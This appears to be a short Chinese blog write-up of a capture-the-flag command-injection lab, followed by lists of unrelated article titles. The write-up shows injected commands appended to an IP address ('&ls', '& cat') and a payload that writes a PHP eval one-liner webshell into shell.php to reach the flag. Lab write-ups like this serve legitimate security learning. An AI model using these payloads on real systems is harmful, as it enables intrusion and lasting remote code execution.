打开靶机

查看页面信息

输入127.0.0.1进行测试

构造payload

127.0.0.1&ls

查看文件内容信息

127.0.0.1 & cat 179852221619745.php

没有反应......

利用命令执行写入一句话木马

127.0.0.1 &echo "<?php @eval(\$_POST['a']);?>" >> shell.php

成功拿到flag

最新文章

1. unity开发相关环境（vs、MonoDevelop）windows平台编码问题
2. Chrome开发者工具详解
3. junit学习笔记
4. 使用NPOI将TABLE内容导出到EXCEL
5. windows API 开发飞机订票系统 图形化界面 (一)
6. SQLite之写一个表
7. CXF之九 WS-Security
8. iOS GorupBy
9. list集合接口
10. Bootstrap下拉菜单
11. ASP.NET MVC Bundles 用法和说明（打包javascript和css）
12. [Swift]LeetCode266.回文全排列 $ Palindrome Permutation
13. Latex文件分别用Texwork和Winedt打开时，产生中文乱码的解决方法
14. 【转载】opencv实现人脸检测
15. Scala - 快速学习04 - 求值策略
16. Sql语句分页，有待优化
17. 初识Style和Theme
18. Find The Multiple--POJ1426
19. GDB 调试PYTHON
20. Flask_WTF升级到最新版本

热门文章

1. zstd c++ string 压缩&解压
2. Python最会变魔术的魔术方法，我觉得是它！
3. 一文带你彻底了解大数据处理引擎Flink内存管理
4. elasticsearch-head 配置
5. windows 下命令行关闭进程。
6. CSS3全览_动画+滤镜
7. Spark性能调优九之常用算子调优
8. 浅析JavaWeb开发模式：Model1和Model2
9. Erlang那些事儿第2回之我是模块(module),一文件一模块
10. iOS label 添加删除线（删划线）遇到的坑